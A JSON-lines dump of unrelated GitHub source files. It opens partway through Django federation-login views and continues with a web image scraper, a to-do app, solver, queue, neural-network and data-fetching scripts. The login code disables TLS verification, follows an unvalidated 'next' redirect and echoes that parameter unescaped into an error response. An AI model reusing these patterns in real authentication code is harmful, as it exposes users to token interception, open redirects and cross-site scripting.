request.GET[\"next\"]\n url = basf_login + \"?redirect_uri=\" + redirect_uri\n url += \"?next=\"\n url += quote(next, safe=\"\")\n return HttpResponseRedirect(url)\n except:\n return HttpResponse(\"Bad Request\",status=400)\n\ndef after_login(request):\n \"\"\" Authentification callback. 
This method is triggered after the authentication cookies were set by the federation login.\n Makes a request to token_to_info_url and checks whether the access token retrieved from cookies is a valid one.\n Args:\n request: Request object\n Returns:\n HttpResponseRedirect: Redirect to the redirect url (get request parameter)\n \"\"\"\n try:\n redirect_url = request.GET[\"next\"]\n auth_header = request.META\n cookie_federation_access_token = request.COOKIES.get('basf_federation_access_token')\n cookie_federation_cn = request.COOKIES.get('basf_federation_cn')\n r = requests.post(token_to_info_url, data={'token': cookie_federation_access_token}, verify=False, timeout=30)\n assert r.status_code == 200\n session_federation = r.json()\n\n if 'error' not in session_federation and session_federation['user_id'] == cookie_federation_cn:\n #User is authenticated\n user = Person.objects.filter(username__iexact=cookie_federation_cn)\n if user.exists():\n #User is member of production ai\n django_login(request, user[0])\n return HttpResponseRedirect(redirect_url)\n #User not authenticated or not member of production AI\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n except Exception as e:\n #Something went wrong during authentication\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n\n\ndef logout(request):\n \"\"\" Logs the user out\n Args:\n request: Request object\n Returns:\n HttpResponseRedirect: Redirect to landing page\n \"\"\"\n django_logout(request)#TODO log out from BASF too (!?)\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n\ndef login_required(request):\n \"\"\" View method that renders login required message.\n Args:\n request: Request object\n Returns:\n HttpResponse with rendered login required template or bad request message.\n \"\"\"\n try:\n return render(request, 'landing_page/login_required.html', {\"next\":request.GET[\"next\"]})\n except:\n return HttpResponse(\"Bad Request at login required: Next is \" + request.GET[\"next\"],status=400)\n","repo_name":"elerator/PRAI","sub_path":"app/landing_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"29934133517","text":"import os,requests,time,pyautogui\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\n\n# Initialize Chrome driver using the Service object\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n\n# Set the URL of the web page containing the images\nurl = \"Enter your URL here\"\n\ndriver.implicitly_wait(30)\n\n# Load the web page\n# driver.maximize_window()\ndriver.get(url)\ntime.sleep(20)\n\ndef download_imgs(i):\n print(f\"Landed on page: {i}=============================\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n # Find all image elements using the specified XPath\n image_elements = driver.find_elements(\"xpath\", \"//*[@class='thumb-img']\")\n \n # Iterate over the image elements and extract the image URLs\n for index, image_element in enumerate(image_elements):\n # Get the source URL of the image\n image_url = image_element.get_attribute(\"src\")\n\n # Download the image\n response = requests.get(image_url)\n image_data = response.content\n\n # Extract the image file name\n image_name = f\"{i}_{index}.jpg\"\n\n # Create a folder to store the images\n 
folder_path = f\"D:/Projects/Face Detection/Images/{i}/\"\n os.makedirs(folder_path, exist_ok=True)\n\n # Save the image to the specified folder\n image_path = os.path.join(folder_path, image_name)\n with open(image_path, \"wb\") as f:\n f.write(image_data)\n print(f\"Image saved: {image_path}\")\n\ndef click_next():\n # Locate the button on the screen\n button_location = pyautogui.locateOnScreen('D:/Projects/Web Scraping/button.png',confidence=0.95)\n if button_location is not None:\n # Get the center coordinates of the button\n button_center = pyautogui.center(button_location)\n # Move the mouse to the button and click\n pyautogui.moveTo(button_center.x, button_center.y, duration=1)\n pyautogui.click()\n pyautogui.moveRel(100, 0, duration=0.5)\n # Optional: Add a delay before clicking\n time.sleep(1) # Add a delay of 1 second (or any desired duration) before clicking\n else:\n print(\"Button not found on the screen---------------------------------------------------------------------------------------------------------------\")\n\nfor i in range(67, 76):\n download_imgs(i)\n click_next()\n print(\"******************************Page: \"+str(i)+\" images downloaded\")","repo_name":"SuhailArfaath/Data-Mining-from-Dynamic-Loading-Pages","sub_path":"Web Scrapping.py","file_name":"Web Scrapping.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24639449739","text":"from django.shortcuts import render, redirect\nfrom .models import Post \nfrom datetime import datetime\n# Create your views here.\n\n\ndef home(request):\n posts = Post.objects.order_by('date')\n post_ddays = [calculate_dday(post.date) for post in posts]\n\n context = {\n 'posts': zip(posts, post_ddays)\n # post 객체와 D-day 값을 튜플 형태로 묶어서 전달\n }\n\n return render(request, 'home.html', context)\n\n# def home(request):\n #posts = Post.objects.order_by('date')\n\n # return render(request, 'home.html', {'posts': posts})\n\ndef homedday(request):\n posts = posts = Post.objects.all\n ddays = calculate_dday(posts.date)\n return render(request, 'detail.html', {'post': post, 'dday': dday})\n\ndef new(request):\n if request.method == 'POST':\n post = Post.objects.create(\n title = request.POST['title'],\n date = request.POST['date'],\n content = request.POST['content'] \n )\n return redirect('detail', post.pk)\n\n return render(request, 'new.html')\n\ndef calculate_dday(post_date):\n today = datetime.today().date()\n dday = (post_date - today).days\n\n return dday\n\ndef detail(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n dday = calculate_dday(post.date)\n return render(request, 'detail.html', {'post': post, 'dday': dday})\n\ndef update(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n\n if request.method == 'POST':\n Post.objects.filter(pk=post_pk).update(\n title = request.POST['title'],\n date = request.POST['date'],\n content = request.POST['content'] \n )\n\n return redirect('detail', post_pk)\n\n return render(request, 'update.html', {'post': post})\n\ndef delete(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n post.delete()\n\n return redirect('home')\n\n","repo_name":"haward0519/NEXT_HW","sub_path":"Todolist/project/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1450716305","text":"#!/usr/bin/env python\n\nfrom pyswip import Prolog\nfrom helper import 
py2pl\n\nprolog = Prolog()\n\n# Facts + Rules\nprolog.consult(\"ex2.pl\")\n\n# Queries\nlist1 = [1,2,3,4]\nlist2 = [5,5,6,6]\n\nqueries = [\n f'not_in_list(5, {py2pl(list1)})',\n f'not_in_list(5, {py2pl(list2)})',\n f'all_different({py2pl(list1)})',\n f'all_different({py2pl(list2)})',\n f'domain({py2pl(list1)}, 1, 4)',\n f'domain({py2pl(list2)}, 1, 4)',\n]\n\nfor query in queries:\n print(query, bool(list(prolog.query(query))))\n","repo_name":"solewniczak/Laboratorium_SI_Przyklady","sub_path":"Lab 1 - Logika pierwszego rzędu/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74118722153","text":"from collections import Counter\nfrom itertools import chain, product\nfrom typing import List\n\n\n# https://leetcode.com/problems/number-of-valid-move-combinations-on-chessboard/discuss/1549108/Python-short-solution-explained\nclass Solution:\n\n def __init__(self):\n self.res = set()\n\n def countCombinations(self, pieces: List[str], positions: List[List[int]]) -> int:\n positions = [tuple(x) for x in positions]\n poss = {\n 'rook': ((1, 0), (-1, 0), (0, 1), (0, -1)),\n 'bishop': ((1, 1), (1, -1), (-1, 1), (-1, -1)),\n 'queen': ((1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (1, -1), (-1, 1), (-1, -1)),\n }\n\n for dirs in product(*(poss[i] for i in pieces)):\n self.dfs(positions, dirs, (1 << len(pieces)) - 1)\n\n return len(self.res)\n\n def dfs(self, pos, dirs, stopped_mask):\n if stopped_mask == 0:\n return\n\n self.res.add(tuple(pos))\n\n for active in range(1 << len(dirs)):\n if (stopped_mask & active) != active:\n continue\n\n new_pos = list(pos)\n new_mask = stopped_mask ^ active\n\n for i in range(len(new_pos)):\n new_pos[i] = (\n new_pos[i][0] + dirs[i][0] * ((new_mask >> i) & 1),\n new_pos[i][1] + dirs[i][1] * ((new_mask >> i) & 1)\n )\n\n if len(Counter(new_pos)) < len(dirs):\n continue\n\n all_c = list(chain(*new_pos))\n\n if min(all_c) <= 0 or max(all_c) > 8:\n continue\n\n self.dfs(new_pos, dirs, new_mask)\n","repo_name":"cabulous/leetcode","sub_path":"python/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4933774035","text":"import itertools\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import distance_matrix\nimport matplotlib\nimport matplotlib.pylab as plt\nimport seaborn as sns\nimport pulp\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nn_customer=7\nn_point=n_customer+1\nvehicle_capacity=4\ndf=pd.DataFrame({\n 'x':[20,16,31,37,11,32,4,23,20],\n 'y':[0,29,27,30,29,19,9,22,0],\n})\ndf.iloc[0]['x']=20\ndf.iloc[0]['y']=0\n\n# get distance matrix\n\ndistances = pd.DataFrame(distance_matrix(df[['x', 'y']].values, df[['x', 'y']].values), index=df.index, columns=df.index).values\n\nfig, ax = plt.subplots(figsize=(4,3))\nsns.heatmap(distances, ax=ax, cmap='Blues', annot=True, fmt='.0f', cbar=True, cbar_kws={\"shrink\": .3}, linewidths=.1)\nplt.title('distance matrix')\nplt.show()\n# check TSP state\n\nplt.figure(figsize=(5, 5))\n\n# draw problem state\nfor i, row in df.iterrows():\n if i == 0:\n plt.scatter(row['x'], row['y'], c='r')\n plt.text(row['x'] + 1, row['y'] + 1, 'depot')\n else:\n plt.scatter(row['x'], row['y'], c='black')\n plt.text(row['x'] + 1, row['y'] + 1, f'{i}')\n \nplt.xlim([-10, 50])\nplt.ylim([-10, 50])\nplt.title('points: 
id')\nplt.show()\n\n\n# define constants\nM=10000\ne=1\nm=1\na=50\nproblem = pulp.LpProblem('KUPC2018_C', pulp.LpMinimize)\n\n# define the variables and their domains\nx=pulp.LpVariable.dicts('x',((i,j) for i in range(n_point) for j in range(n_point)),lowBound=0,upBound=1,cat='Binary')\ny=pulp.LpVariable.dicts('y',((i,j) for i in range(n_point) for j in range(n_point)),lowBound=0,upBound=1,cat='Binary')\n# we need to keep track of the order in the tour to eliminate the possibility of subtours\nu = pulp.LpVariable.dicts('u', (i for i in range(n_point)), lowBound=1, upBound=n_point, cat='Integer')\n\n# set objective function\nproblem += pulp.lpSum((distances[i][j])*(x[i,j])for i in range(n_point)for j in range(n_point))/40\n\n\nproblem += (pulp.lpSum(x[0,j]for j in range(1,n_point)))== 1\n\n\nproblem += (pulp.lpSum(x[j,0]for j in range(1,n_point))) == 1\n\n\n# visit every vertex\n\n\"\"\"\nfor j in range(n_point):\n problem += (y[j,i] for i in range(n_point)if i != j)<= pulp.lpSum(x[h,j]for h in range(n_point)if h != j)\n\"\"\"\n\nfor j in range(1,n_point):\n problem += pulp.lpSum(x[i,j]for i in range(n_point) if i !=j) + pulp.lpSum(y[j,0])==1\n# visit every vertex\n\nfor j in range(n_point):\n problem +=pulp.lpSum(x[i,j]for i in range(n_point) if i != j)==pulp.lpSum(x[j,k]for k in range(n_point)if j != k)\n# if a route arrives at j from i, a route must also depart from j\n\n# all drone delivery points are served by the drone\n\"\"\"\nfor i in range(1,n_point):\n problem += pulp.lpSum(y[i,j] for j in range(1,n_point) if i != j) <=2\n\"\"\"\n\"\"\"\nproblem+= pulp.lpSum(y[i,j] for j in range(1,n_point)for i in range(1,n_point) if i != j) ==2\n\"\"\"\n\"\"\"\nfor j in range(1,n_point):\n problem += pulp.lpSum(y[i,j]for i in range(n_point) if i !=j) + pulp.lpSum(y[j,k]for k in range(1,n_point)if i != j)<=1\n\"\"\"\nproblem += pulp.lpSum(y[j,0]for j in range(1,n_point)) ==m\n\nfor j in range(1,n_point):\n problem +=y[0,j]==y[j,0]\n\nfor i in range(n_point):\n for j in range(n_point):\n if i !=j:\n problem += e >= (distances[i][j]/a+distances[j][0]/a)*y[i,j] \n# maximum flight time\n\n\"\"\"\nfor i in range(n_point):\n for j in range(n_point): \n if i != j and (i != 0 and j != 0):\n problem += u[i] - u[j] >= 1 - (n_point+1) * (1 - y[i, j])\n\"\"\"\n# eliminate subtour\nfor i in range(n_point):\n for j in range(n_point): \n if i != j and (i != 0 and j != 0):\n problem += u[i] - u[j] <= (n_point+1) * (1 -x[i, j])- 1\n\n# solve problem\nstatus = problem.solve()\n\nprint(pulp.LpStatus[status])\n# output status, value of objective function\nstatus, pulp.LpStatus[status], pulp.value(problem.objective)\n\n\n# check TSP problem and optimized route\n\nplt.figure(figsize=(5, 5))\n\n# draw problem state\nfor i, row in df.iterrows():\n if i == 0:\n plt.scatter(row['x'], row['y'], c='r')\n plt.text(row['x'] + 1, row['y'] + 1, 'depot')\n \n else:\n plt.scatter(row['x'], row['y'], c='black')\n plt.text(row['x'] + 1, row['y'] + 1, f'{i}')\n \nplt.xlim([-10, 50])\nplt.ylim([-10, 50])\nplt.title('points: id')\n\n# draw optimal route\nroutes = [(i, j) for i in range(n_point) for j in range(n_point) if pulp.value(x[i, j]) == 1]\narrowprops = dict(arrowstyle='->', connectionstyle='arc3', edgecolor='blue')\nfor i, j in routes:\n plt.annotate('', xy=[df.iloc[j]['x'], df.iloc[j]['y']], xytext=[df.iloc[i]['x'], df.iloc[i]['y']], arrowprops=arrowprops)\nroutes1 = [(i, j) for i in range(n_point) for j in range(n_point) if pulp.value(y[i, j]) == 1]\n\narrowprops = dict(arrowstyle='->', connectionstyle='arc3', edgecolor='red')\nfor i, j in routes1:\n plt.annotate('', xy=[df.iloc[j]['x'], df.iloc[j]['y']], xytext=[df.iloc[i]['x'], df.iloc[i]['y']], 
arrowprops=arrowprops) \nplt.show()\n","repo_name":"masaRisu/fstsp","sub_path":"PDSTSP.py","file_name":"PDSTSP.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10750110867","text":"from solutions.ch7.Empty import Empty\nfrom solutions.ch7.LinkedList import LinkedList, printList\n\nclass LinkedQueue:\n \n def __init__(self) -> None:\n self._data = LinkedList()\n \n def __len__(self):\n return len(self._data)\n \n def is_empty(self):\n return self._data.is_empty()\n\n def enqueue(self, e):\n self._data.add_last(e)\n\n def dequeue(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n e = self._data.delete_first()\n return e\n\n def rotate(self):\n old_head = self._data.first()\n old_tail = self._data.last()\n\n self._data._head = old_head._next\n old_tail._next = old_head\n\n self._data._tail = old_head\n old_head._next = None\n\n '''\n 7.26 Implement a method, concatenate(Q2) for the LinkedQueue class that\n takes all elements of LinkedQueue Q2 and appends them to the end of the\n original queue. The operation should run in O(1) time and should result\n in Q2 being an empty queue.\n '''\n def concatenate(self, q):\n self._data._tail._next = q._data._head\n self._data._tail = q._data._tail\n self._data._size += q._data._size\n\n q._data._head, q._data._tail = None, None\n q._data._size = 0\n\ndef usage():\n q = LinkedQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n \n q.rotate()\n q.rotate()\n q.rotate()\n printList(q._data)\n\n p = LinkedQueue()\n p.enqueue(4)\n p.enqueue(5)\n p.enqueue(6)\n\n q.concatenate(p)\n printList(q._data)\n print(len(p))\n print(p.is_empty())\n\n #printList(q._data)\n #print(q.dequeue())\n #print(q.dequeue())\n #print(q.dequeue())\n #print(q.is_empty())\n\nif __name__ == \"__main__\":\n usage()","repo_name":"itma96/Data-Structures-And-Algorithms-In-Python","sub_path":"solutions/ch7/LinkedQueue.py","file_name":"LinkedQueue.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35224241782","text":"import sys\n\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import TextIO\nfrom typing import Union\n\nfrom .exceptions import StreamProcessingError\n\n\nclass StreamProcessor:\n def __init__(\n self,\n path: Optional[str] = None,\n sep: str = None,\n encoding: str = \"utf-8\",\n flatten: bool = False,\n ignore_invalid: bool = False,\n ):\n self._path = path\n self._sep = sep\n self._ignore_invalid = ignore_invalid\n self._encoding = encoding\n self._flatten = flatten\n\n self._stream = None # type: Optional[TextIO]\n self._stream_iter = None # type: Optional[Iterator[List[float]]]\n self._last_line = None # type: Optional[str]\n\n @property\n def stream(self) -> TextIO:\n \"\"\"Return the stream that we're reading from\"\"\"\n if not self._stream is None:\n return self._stream\n if self._path is None:\n self._stream = sys.stdin\n else:\n self._stream = open(self._path, \"r\", encoding=self._encoding)\n return self._stream\n\n @property\n def last_line(self) -> Optional[str]:\n \"\"\"The most recently parsed line\"\"\"\n return self._last_line\n\n def close_stream(self):\n if self._stream is None:\n return\n if self._stream == sys.stdin:\n return\n self._stream.close()\n\n def __iter__(self) -> \"StreamProcessor\":\n self._stream_iter = self.process_stream()\n return self\n\n def __next__(self) -> 
List[float]:\n assert not self._stream_iter is None\n return next(self._stream_iter)\n\n def process_stream(self) -> Iterator[List[float]]:\n \"\"\"Process the input stream\"\"\"\n for line in self.stream:\n self._last_line = line\n\n # Skip empty lines\n if not line.strip():\n continue\n\n # Split the line in case of multidimensional data\n parts = line.split(sep=self._sep)\n\n # Parse numbers from text\n values = list(map(self.parse_numeric, parts))\n\n # Flatten the input array if desired\n if self._flatten:\n for value in values:\n yield [value]\n else:\n yield values\n self.close_stream()\n\n def parse_numeric(self, x: str) -> float:\n \"\"\"Parse a string number, preserving type\"\"\"\n x = x.rstrip(\"\\r\\n\")\n parse_func = float if \".\" in x else int\n try:\n return parse_func(x)\n except ValueError:\n pass\n if self._ignore_invalid:\n return float(\"nan\")\n self.close_stream()\n raise StreamProcessingError(x)\n","repo_name":"GjjvdBurg/Veld","sub_path":"veld/stream_processor.py","file_name":"stream_processor.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16469169142","text":"import argparse\nimport numpy as np\nimport pandas as pd\nfrom icecube_utils import (\n inference, \n load_pretrained_model\n)\nfrom train_large import build_parser, configure, seed_everything\n\n\ndef parse_args():\n parser = build_parser()\n parser.add_argument('--test-db-path', type=str, default='/kaggle/working/test_database.db')\n parser.add_argument('--save-path', type=str, default='/kaggle/working/submission.csv')\n parser.add_argument('--num-workers', type=int, default=3)\n parser.add_argument('--max-n-pulses', type=int, default=None)\n return parser.parse_args()\n\n\ndef prepare_dataframe(df, angle_post_fix = '_reco', vec_post_fix = '') -> pd.DataFrame:\n r = np.sqrt(df['direction_x'+ vec_post_fix]**2 + df['direction_y'+ vec_post_fix]**2 + df['direction_z' + vec_post_fix]**2)\n df['zenith' + angle_post_fix] = np.arccos(df['direction_z'+ vec_post_fix]/r)\n df['azimuth'+ angle_post_fix] = np.arctan2(df['direction_y'+ vec_post_fix],df['direction_x' + vec_post_fix]) #np.sign(results['true_y'])*np.arccos((results['true_x'])/(np.sqrt(results['true_x']**2 + results['true_y']**2)))\n df.loc[df['azimuth' + angle_post_fix]<0, 'azimuth'+ angle_post_fix] = df['azimuth' + angle_post_fix][df['azimuth' + angle_post_fix]<0] + 2*np.pi \n\n drop_these_columns = []\n for column in df.columns:\n if column not in ['event_id', 'zenith', 'azimuth']:\n drop_these_columns.append(column)\n return df.drop(columns = drop_these_columns).iloc[:,[0,2,1]].set_index('event_id')\n\n\ndef main(args):\n seed_everything(0)\n config = configure(args)\n\n config['train_mode'] = 'default'\n config['dataset_type'] = 'sqlite'\n config['train_transforms'] = []\n config['batch_size'] = args.batch_size\n config['num_workers'] = args.num_workers\n config['path'] = args.test_db_path\n config['inference_database_path'] = args.test_db_path\n config['fit']['distribution_strategy'] = 'ddp'\n\n config['max_n_pulses']['max_n_pulses'] = None\n if args.max_n_pulses is not None:\n config['max_n_pulses']['max_n_pulses'] = args.max_n_pulses\n config['max_n_pulses']['max_n_pulses_strategy'] = 'clamp' \n\n model = load_pretrained_model(\n config=config, \n path=str(args.state_dict_path),\n return_train_dataloader=False,\n )\n model.additional_attributes = ['event_id']\n\n df = inference(\n model.cuda(), \n config,\n use_labels=False\n )\n\n 
df['event_id'] = df['event_id'].astype(int)\n df = df.sort_values(by='event_id')\n df = prepare_dataframe(df, angle_post_fix='', vec_post_fix='')\n df.to_csv(args.save_path)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"mkotyushev/icecube","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3518295953","text":"# from https://towardsdatascience.com/residual-network-implementing-resnet-a7da63c7b278\nimport torch\nfrom torch import nn\nfrom functools import partial\nfrom . import building_block as BB\nfrom . import CNN_basic as CB\n\n\nclass Conv2dAuto(nn.Conv2d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.padding = (self.kernel_size[0] // 2, self.kernel_size[1] // 2)\n # dynamic add padding based on the kernel_size\n\n\ndef activation_func(activation):\n return nn.ModuleDict([\n ['relu', nn.ReLU(inplace=True)],\n ['leaky_relu', nn.LeakyReLU(negative_slope=0.01, inplace=True)],\n ['selu', nn.SELU(inplace=True)],\n ['none', nn.Identity()]\n ])[activation]\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, activation='relu',\n *args, **kwargs):\n super().__init__()\n self.in_channels, self.out_channels, self.activation = \\\n in_channels, out_channels, activation\n self.blocks = nn.Identity()\n self.activate = activation_func(activation)\n self.shortcut = nn.Identity()\n\n def forward(self, x):\n residual = x\n if self.should_apply_shortcut:\n residual = self.shortcut(x)\n x = self.blocks(x)\n x += residual\n x = self.activate(x)\n return x\n\n @property\n def should_apply_shortcut(self):\n return self.in_channels != self.out_channels\n\n\nclass ResNetResidualBlock(ResidualBlock):\n def __init__(self, in_channels, out_channels, expansion=1, downsampling=1,\n *args, **kwargs):\n conv = partial(Conv2dAuto, kernel_size=3, bias=False)\n super().__init__(in_channels, out_channels, *args, **kwargs)\n self.expansion, self.downsampling, self.conv = expansion, downsampling, conv\n self.shortcut = nn.Sequential(\n nn.Conv2d(self.in_channels, self.expanded_channels, kernel_size=1,\n stride=self.downsampling, bias=False),\n nn.BatchNorm2d(self.expanded_channels)) if self.should_apply_shortcut else None\n \n @property\n def expanded_channels(self):\n return self.out_channels * self.expansion\n \n @property\n def should_apply_shortcut(self):\n return self.in_channels != self.expanded_channels\n\ndef conv_bn(in_channels, out_channels, conv, *args, **kwargs):\n return nn.Sequential(conv(in_channels, out_channels, *args, **kwargs), \n nn.BatchNorm2d(out_channels))\n\nclass ResNetBasicBlock(ResNetResidualBlock):\n \"\"\"\n Basic ResNet block composed by two layers of 3x3conv/batchnorm/activation\n \"\"\"\n expansion = 1\n def __init__(self, in_channels, out_channels, *args, **kwargs):\n super().__init__(in_channels, out_channels, *args, **kwargs)\n self.blocks = nn.Sequential(\n conv_bn(self.in_channels, self.out_channels, conv=self.conv, bias=False, stride=self.downsampling),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.expanded_channels, conv=self.conv, bias=False),\n )\n \nclass ResNetBottleNeckBlock(ResNetResidualBlock):\n expansion = 4\n def __init__(self, in_channels, out_channels, *args, **kwargs):\n super().__init__(in_channels, out_channels, expansion=4, *args, **kwargs)\n self.blocks = nn.Sequential(\n 
conv_bn(self.in_channels, self.out_channels, self.conv, kernel_size=1),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.out_channels, self.conv, kernel_size=3, stride=self.downsampling),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.expanded_channels, self.conv, kernel_size=1),\n )\n\nclass ResNetLayer(nn.Module):\n \"\"\"\n A ResNet layer composed by `n` blocks stacked one after the other\n \"\"\"\n def __init__(self, in_channels, out_channels, block=ResNetBasicBlock, n=1,\n *args, **kwargs):\n super().__init__()\n # 'We perform downsampling directly by convolutional layers that have a stride of 2.'\n downsampling = 2 if in_channels != out_channels else 1\n self.blocks = nn.Sequential(\n block(in_channels , out_channels, *args, **kwargs,\n downsampling=downsampling),\n *[block(out_channels * block.expansion, \n out_channels, downsampling=1, *args, **kwargs) for _ in range(n - 1)]\n )\n\n def forward(self, x):\n x = self.blocks(x)\n return x\n\nclass ResNetEncoder(nn.Module):\n \"\"\"\n ResNet encoder composed by layers with increasing features.\n Args:\n `in_channels`: number of channels in the input image\n `block_sizes`: number of channels in each layer\n `depths`: number of resnet blocks\n \"\"\"\n def __init__(self, in_channels=3, blocks_sizes=[64, 128, 256, 512], \n depths=[2,2,2,2], activation='relu', block=ResNetBasicBlock,\n *args, **kwargs):\n super().__init__()\n self.blocks_sizes = blocks_sizes\n \n # first layer\n self.gate = nn.Sequential(\n nn.Conv2d(in_channels, self.blocks_sizes[0], kernel_size=7,\n stride=2, padding=3, bias=False),\n nn.BatchNorm2d(self.blocks_sizes[0]),\n activation_func(activation),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n \n self.in_out_block_sizes = list(zip(blocks_sizes, blocks_sizes[1:]))\n self.blocks = nn.ModuleList([ \n ResNetLayer(blocks_sizes[0], blocks_sizes[0], n=depths[0],\n activation=activation, block=block,*args, **kwargs),\n *[ResNetLayer(in_channels * block.expansion, \n out_channels, n=n, activation=activation, \n block=block, *args, **kwargs) \n for (in_channels, out_channels), n in zip(self.in_out_block_sizes, depths[1:])] \n ])\n \n def forward(self, x):\n x = self.gate(x)\n for block in self.blocks: x = block(x)\n return x\n\nclass ResNet(nn.Module):\n def __init__(self, in_channels, n_classes, add_sigmoid='None',\n times_max=1, extra_features=0, dropout=0, *args, **kwargs):\n super().__init__()\n self.encoder = ResNetEncoder(in_channels, *args, **kwargs)\n self.decoder = CB.CNN2d_decoder(self.encoder.blocks[-1].blocks[-1].expanded_channels, n_classes)\n self.add_sigmoid = add_sigmoid\n self.times_max = times_max\n \n def forward(self, x):\n if type (x) == torch.Tensor:\n x = self.encoder(x)\n x = self.decoder(x)\n elif type (x) == list:\n encoder_x = self.encoder (x[0])\n x = self.decoder ([encoder_x, x[1]])\n return BB.act_func (x, self.add_sigmoid, self.times_max)\n\ndef resnet2d_n (in_channels, n_classes, model_type='resnet18', **kwargs):\n if model_type == 'resnet2d_18':\n return ResNet(in_channels, n_classes, block=ResNetBasicBlock,\n depths=[2, 2, 2, 2], **kwargs)\n elif model_type == 'resnet2d_34':\n return ResNet(in_channels, n_classes, block=ResNetBasicBlock,\n depths=[3, 4, 6, 3], **kwargs)\n elif model_type == 'resnet2d_50':\n return ResNet(in_channels, n_classes, block=ResNetBottleNeckBlock,\n depths=[3, 4, 6, 3], **kwargs)\n elif model_type == 'resnet2d_101':\n return ResNet(in_channels, n_classes, block=ResNetBottleNeckBlock,\n depths=[3, 4, 23, 3], 
**kwargs)\n","repo_name":"Yutong441/fICHnet","sub_path":"fICHnet/CNN/resnet_2d.py","file_name":"resnet_2d.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30989487763","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Source code for the MAR_gravity ETOPO source dataset class.\"\"\"\n\nimport os\nimport subprocess\nimport numpy\n\nTHIS_DIR = os.path.split(__file__)[0]\n\n##############################################################################\n# Code for importing the /src directory so that other modules can be accessed.\nimport import_parent_dir\nimport_parent_dir.import_src_dir_via_pythonpath()\n##############################################################################\n\nimport datasets.etopo_source_dataset as etopo_source_dataset\nimport datasets.dataset_geopackage as dataset_geopackage\n\nclass source_dataset_MAR_gravity(etopo_source_dataset.ETOPO_source_dataset):\n \"\"\"Look in \"src/datasets/etopo_source_dataset.py\" to get base class definition.\"\"\"\n def __init__(self,\n configfile = os.path.join(THIS_DIR, \"MAR_gravity_config.ini\" )):\n \"\"\"Initialize the MAR_gravity source dataset object.\"\"\"\n\n super(source_dataset_MAR_gravity, self).__init__(\"MAR_gravity\", configfile)\n\n def fetch_tiles(self, resolution_s=15, crm_only_if_1s=True, verbose=True):\n \"\"\"Using the CUDEM 'fetches' module, create all the tiles needed for this dataset.\"\"\"\n etopo_gpkg = dataset_geopackage.ETOPO_Geopackage(resolution = resolution_s)\n etopo_gdf = etopo_gpkg.get_gdf(crm_only_if_1s=crm_only_if_1s,\n resolution_s=resolution_s,\n verbose=verbose).copy()\n\n # Loop through all the ETOPO files and create an identical tile in this dataset.\n for i, row in etopo_gdf.iterrows():\n xleft = row.xleft\n xright = numpy.round(xleft + (row.xsize*row.xres))\n ytop = row.ytop\n ybottom = numpy.round(ytop + (row.ysize*row.yres))\n\n mar_tile_fname = os.path.join(self.config._abspath(self.config.source_datafiles_directory),\n self.config.datafiles_name_template.format(resolution_s,\n \"N\" if ybottom >= 0 else \"S\",\n abs(int(numpy.round(ybottom))),\n \"E\" if xleft >= 0 else \"W\",\n abs(int(numpy.round(xleft)))))\n\n fetches_command = [\"waffles\", \"-M\", \"surface\",\n \"-R\", \"{0}/{1}/{2}/{3}\".format(xleft,xright,ybottom,ytop),\n \"-E\", \"{0}s\".format(resolution_s),\n \"--t_srs\", \"EPSG:4326\",\n \"-O\", os.path.splitext(mar_tile_fname)[0],\n \"-F\", \"GTiff\",\n \"mar_grav\"]\n\n print(\" \".join(fetches_command))\n\n # p = subprocess.run(fetches_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)\n p = subprocess.run(fetches_command)\n if (not ((p.returncode == 0) or os.path.exists(mar_tile_fname))) and verbose:\n 